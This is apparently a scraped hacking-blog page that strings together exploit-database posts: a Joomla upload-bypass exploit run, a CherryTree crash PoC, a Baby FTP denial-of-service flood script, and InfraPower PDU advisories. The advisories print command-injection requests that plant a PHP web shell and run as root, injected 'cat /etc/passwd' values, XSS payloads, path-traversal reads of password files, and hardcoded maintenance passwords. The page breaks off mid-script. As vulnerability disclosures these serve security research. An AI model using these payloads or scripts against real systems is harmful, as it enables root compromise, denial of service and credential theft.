Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa
While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing <?php, or with the extensions .php and .phtml, but they do allow <?= and .pht files, which works out of the box on most hosting environments, including the standard Ubuntu LAMP install, as per:
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
Usage
Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution.
$ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla
@@@ @@@@@@ @@@@@@ @@@@@@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@
@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@
@@! @@! @@@ @@! @@@ @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@!
!@! !@! @!@ !@! @!@ !@! !@! !@! !@! @!@ !@! @!@ !@! @!@ !@
!!@ @!@ !@! @!@ !@! @!! !!@ @!@ @!@!!@! @!@!@!@! @!@!@!@! @!@
!!! !@! !!! !@! !!! !@! ! !@! !!@!@! !!!@!!!! !!!@!!!! !!!
!!: !!: !!! !!: !!! !!: !!: !!: :!! !!: !!! !!: !!!
!!: :!: :!: !:! :!: !:! :!: :!: :!: !:! :!: !:! :!: !:! :!:
::: : :: ::::: :: ::::: :: ::: :: :: ::: :: ::: :: ::: ::
: ::: : : : : : : : : : : : : : : : : : :::
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht
[*] Calling exploit
[$] Exploit Successful!
[*] SUCCESS: http://localhost:8080/joomla
Full Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40637.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863291409
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/python
### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.giuspen.com/cherrytree/
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
# Version: Affects all versions of CherryTree prior to 0.37.6
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script. It will generate a "PoC-1.ctd" file.
# * Open the file and hover over the link.
# Bonus
# =====
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
# Why?
# ====
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
# trying to draw the contents of the graphical bitmaps.
# Exploit code
# ============
crashfile = '''<?xml version="1.0" ?>
<cherrytree>
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
<rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
</node>
</cherrytree>
'''
with open("PoC-1.ctd", 'w') as f:
f.write(crashfile)
f.close()
#!/usr/bin/python
### Baby FTP 1.24 - Denial of Service by n30m1nd ###
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.pablosoftwaresolutions.com/
# Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
# Version: 1.24
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script and write the IP to attack.
# Why?
# ====
# The FTP Server can't handle more than ~1505 connections at the same time
# Exploit code
# ============
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,21)))
print "[+] Connection %d" % i
crash1 = "A"*500
sarr[i].send("USER anonymous\r\n" )
sarr[i].recv(4096)
sarr[i].send("PASS n30m1nd\r\n" )
sarr[i].recv(4096)
i+=1
except socket.error:
print "[*] Server crashed!!"
raw_input()
break
InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple unauthenticated remote command
injection vulnerabilities. The vulnerability exist due to several POST
parameters in several scripts not being sanitized when using the exec(),
proc_open(), popen() and shell_exec() PHP function while updating the
settings on the affected device. This allows the attacker to execute
arbitrary system commands as the root user and bypass access controls in
place.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5372
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
27.09.2016
--
doupgrate.php:
--------------
09: <?
10: echo "Firmware Upgrate Using NFS:<BR>";
11: echo "IP=".$_POST["ipaddr"]."<BR>";
12: echo "Firmware Name=".$_POST["fwname"]."<BR>";
13: system("sh nfs.sh");
14: echo "Mounting NFS<BR>";
15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
16: system("cp /nfs/".$_POST["fwname"]." /");
17: echo "Flash erasing<BR>";
18: system("@flash_eraseall /dev/mtd0");
19: system("cp /".$_POST["fwname"]." /dev/mtd0");
20: echo "Upgrate done<BR>";
21: system("umount /nfs");
22: echo "Reboot system<BR>";
23: system("reboot");
24: ?>
---------------------------------------------------------------------
IPSettings.php:
---------------
83: $IP_setting = ereg_ip($_POST['IP']);
84: $Netmask_setting = ereg_ip($_POST['Netmask']);
85: $Gateway_setting = ereg_ip($_POST['Gateway']);
...
...
110: $fout = fopen("/mnt/mtd/net_conf", "w");
111: if($fout){
112: $output = substr($output, 0, -1);
113: fprintf($fout, "%s", $output);
114: //echo $change_ip.'b';
115: if($change_ip === '1'){
116: $str = '';
117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
118: // echo $str."\n";
119: }
120: if($change_gw === '1'){
121: $str = '';
122: exec('ip route del default', $str);
123: exec('route add default gw '.$Gateway_setting, $str);
124: // echo $str[0]."a\n";
125: }
126: }
127: fclose($fout);
...
...
164: function ereg_ip($ipstring){
165: $ipstring=trim($ipstring); //移除前後空白
166: //格式錯誤
167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
168: //內容檢查
169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
170: foreach($ip_segment as $k =>$v){
171: if($v >255){
171: return 0;
172: }
173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
174: } //end foreach
175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
176: return $ipstring;
177: }
---------------------------------------------------------------------
Login.php:
----------
126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
127: $Password = getConf("/mnt/mtd/web_conf", "Password");
128:
129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
...
...
140: $_SESSION['Login'] = $_POST['ID_User'];
141:
142: //Login
143: $loginTime = date("Y-m-d,H:i:s.0,P");
144: $remoteIP = $_SERVER['REMOTE_ADDR'];
145: //----------SNMP checking ---Ed 20130307------------------------<
146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
147: if ($SNMPEnable == "1") {
148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
149: if ($TrapEnable == "v2Trap") {
150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
152: //echo "alert($res);";
153: }
154: }
---------------------------------------------------------------------
Ntp.php:
--------
36: <?php
37: if(empty($_POST['Change']))
38: $tzone='8';
39: else
40: {
41:
42: $tzone=$_POST['ID_timezone'];
43: $idx=$tzone+12;
44: echo "update status...";
45: exec("/usr/bin/ntpclient -s -h 220.130.158.71");
46: exec("/usr/bin/zonegen ".$idx);
47: exec("/usr/bin/zic -d /usr/bin/ zonetime");
48: exec("mv /usr/bin/localtime /etc/localtime");
49: echo "OK";
50: }
51: ?>
---------------------------------------------------------------------
production_test1.php:
---------------------
4: if( isset($_POST['macAddress']) )
5: {
6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
8: /*$result = $fail;
9: echo $mac . ",";
10: echo $_POST['macAddress'];
11: if( !strcmp($mac,$_POST['macAddress']) )
12: $result = $success;
13: echo "verify - " . $mac . " - " . $result;*/
14: echo "verify - " . $mac;
15:
16: exit();
17: }
---------------------------------------------------------------------
SNMP.php:
---------
34: if($_POST["SNMPAgent"] === "Enable"){
35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
37:
38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
39: {
40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
43: setSnmpConf(1,$_POST["CommuintyString"]);
44: setSnmpConf(2,$_POST["CommuintyWrite"]);
45: $pCommunity = $_POST["CommuintyString"];
46: }
---------------------------------------------------------------------
System.php:
-----------
86: if(!empty($_POST['ChangeTime']) == "1"){
87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
88:
89: //Ray modify
90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
92:
93:
94: if(isset($_POST['TimeZone'])){
95: setTimeZone($_POST['TimeZone']);
96: $orgZone = $_POST['TimeZone'];
97: }
98:
99: exec('date '.$datetime);
100: exec('hwclock -w');
101: exec('hwclock -w -f /dev/rtc1');
...
...
180: if(isset($_POST['TimeServer'])){
181: //$TimeServer = ereg_ip($_POST['TimeServer']);
182: if(!empty($_POST['TimeServer'])){
183: $TimeServer = $_POST['TimeServer'];
184:
185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
...
...
286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
...
...
292: exec('route add default gw '.$Gateway_setting, $str);
...
...
336: function ereg_ip($ipstring){
337: $ipstring=trim($ipstring); //移除前後空白
338: //格式錯誤
339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
340: //內容檢查
341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
342: foreach($ip_segment as $k =>$v){
343: if($v >255){
344: return 0;
345: }
346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
347: } //end foreach
348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
349: return $ipstring;
350: }
---------------------------------------------------------------------
UploadEXE.php:
--------------
72: if(isset($_POST['hasFile'])){
73: if ($_FILES['ExeFile']['error'] > 0){
74: echo 'Error: ' . $_FILES['FW']['error'];
75: }else{
76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';
...
...
80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
---------------------------------------------------------------------
---------------------------------------------------------------------
---------------------------------------------------------------------
#1
--
PoC Request:
curl -i -s -k -X 'POST' \
-H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
'https://192.168.0.17/SNMP.php?Menu=SMP'
...
curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a
Response:
root
at
Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
#2
--
PoC Request:
POST /production_test1.php HTTP/1.1
Host: 192.168.0.17
User-Agent: ZSL-Injectinator/3.1 (Unix)
Content-Type: application/x-www-form-urlencoded
Connection: close
macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
Response:
HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.9
Content-type: text/html
Connection: close
Date: Fri, 17 Jan 2003 16:58:52 GMT
Server: lighttpd/1.4.30-devel-1321
Content-Length: 751
verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5369
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
27.09.2016
--
#################################################################################
GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1
#################################################################################
POST /FWUpgrade.php HTTP/1.1
Host: 192.168.0.17
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
Connection: close
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
Content-Type: text/php
t00t
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="upfile"
somefile.php
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="ID_Page"
Firmware.php?Menu=FRM
------WebKitFormBoundary207OhXVwesC60pdh--
#################################################################################
POST /SNMP.php?Menu=SMP HTTP/1.1
Host: 192.168.0.17
SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
#################################################################################
lqwrm@zslab:~#
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
-------------------------------------------------
PHP Source Code Security Scanner v0.2
(c) Zero Science Lab - http://www.zeroscience.mk
Tue Sep 27 10:35:52 CEST 2016
-------------------------------------------------
Scanning recursively...Done.
dball.php:
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
doupgrate.php:
Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 15: Command Injection in 'system' via '$_POST'
Line 16: Command Injection in 'system' via '$_POST'
Line 19: Command Injection in 'system' via '$_POST'
Firmware.php:
Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
Function.php:
Line 257: Header Injection in 'header' via '$_SERVER'
Line 267: Header Injection in 'header' via '$_SERVER'
FWUpgrade.php:
Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
index.php:
Line 2: Header Injection in 'header' via '$_SERVER'
IPSettings.php:
Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Line 117: Command Injection in 'exec' via '$IP_setting'
Line 117: Command Injection in 'exec' via '$Netmask_setting'
Line 123: Command Injection in 'exec' via '$Gateway_setting'
ListFile.php:
Line 12: PHP File Inclusion in 'fgets' via '$fp'
Login.php:
Line 151: Command Injection in 'shell_exec' via '$_POST'
Ntp.php:
Line 46: Command Injection in 'exec' via '$idx'
OutletDetails.php:
Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
PDUStatus.php:
Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
production_test1.php:
Line 6: Command Injection in 'shell_exec' via '$_POST'
Line 45: Command Injection in 'proc_open' via '$_ENV'
SensorDetails.php:
Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
SensorStatus.php:
Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
SNMP.php:
Line 41: Command Injection in 'exec' via '$_POST'
System.php:
Line 54: Header Injection in 'header' via '$_SERVER'
Line 64: Header Injection in 'header' via '$_SERVER'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 185: Command Injection in 'exec' via '$TimeServer'
Line 286: Command Injection in 'exec' via '$IP_setting'
Line 286: Command Injection in 'exec' via '$Netmask_setting'
Line 292: Command Injection in 'exec' via '$Gateway_setting'
UploadEXE.php:
Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 82: Command Injection in 'popen' via '$_FILES'
Line 96: PHP File Inclusion in 'fgets' via '$fp'
Line 96: PHP File Inclusion in 'fgets' via '$buffer'
WriteRequest.php:
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
-----------------------------------------------------
Scan finished. Check results in scan_output.txt file.
lqwrm@zslab:~#
InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a file disclosure vulnerability when
input passed thru the 'file' parameter to 'ListFile.php' script is
not properly verified before being used to read files. This can
be exploited to disclose contents of files from local resources.
-------------------------------------------------------------------
ListFile.php:
-------------
8: if(isset($_GET['file'])){
9: $handle = $_GET['file'];
10: $fp = fopen('/ramdisk/'.$handle, 'r');
11: while(!feof($fp)){
12: $tmp=fgets($fp,2000);
13: $tmp = str_replace("\n","<br />",$tmp);
14: echo $tmp;
15: }
16: fclose($fp);
17: }
-------------------------------------------------------------------
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5370
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
27.09.2016
--
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
LoginAuth 1
UserName 00000000
Password 00000000
http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
dmin 999999
manager 666666
user 111111
http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
#!/bin/sh
echo -n "Please enter maintenance password:"
read -s pass
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
if [ "$InfraType" == "1" ]; then
if [ "$pass" != "InfraSolution" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "2" ]; then
if [ "$pass" != "InfraGuard" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "3" ]; then
if [ "$pass" != "InfraPower" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "4" ]; then
if [ "$pass" != "InfraCool" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
#---emergency recovery mode
echo "DEBUG su mode started!"
su
fi
fi
fi
fi
# create menu
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
while true; do
echo -n "Input Maintenance menu item number(? for help):"
read y
case $y in
"?")
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
;;
"1")
echo "****/mnt/mtd/main_conf******************************"
vi /mnt/mtd/main_conf
echo "****************************************************"
;;
"2")
echo "****/mnt/mtd/snmp_conf******************************"
cat /mnt/mtd/snmp_conf
echo "****************************************************"
;;
"3")
echo "****/mnt/mtd/net_conf*******************************"
cat /mnt/mtd/net_conf
echo "****************************************************"
;;
"4")
echo "****/mnt/mtd/web_conf*******************************"
cat /mnt/mtd/web_conf
echo "****************************************************"
;;
"5")
echo "(5) Enable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans5
if [ "$ans5" == "y" ]; then
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
echo -n "Patching boot.sh ..."
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
chmod 777 /mnt/mtd/boot.sh
if [ -f "/mnt/mtd/boot.sh" ]; then
echo "...done"
else
echo "...fail"
fi
else
echo "file not exist: /mnt/mtd/patch/boot.sh"
fi
fi
;;
"6")
echo "(6) Disable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans6
if [ "$ans6" == "y" ]; then
if [ -f "/mnt/mtd/boot.sh" ]; then
echo -n "Disabling boot.sh pacthing..."
rm /mnt/mtd/boot.sh
echo "...done"
else
echo "File not exist: /mnt/mtd/boot.sh"
fi
fi
;;
"7")
echo "(7) Clear /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans7
if [ "$ans7" == "y" ]; then
echo -n " Removing patch files (/mnt/mtd/patch/*)..."
rm -r /mnt/mtd/patch/*
if [ ! -f "/mnt/mtd/patch/" ]; then
echo "...done"
echo -n "Reboot to apply changes? [y/n]:"
read ans7r
if [ "$ans7r" == "y" ]; then
echo "Rebooting..."
reboot
fi
else
echo "...fail"
fi
fi
;;
"8")
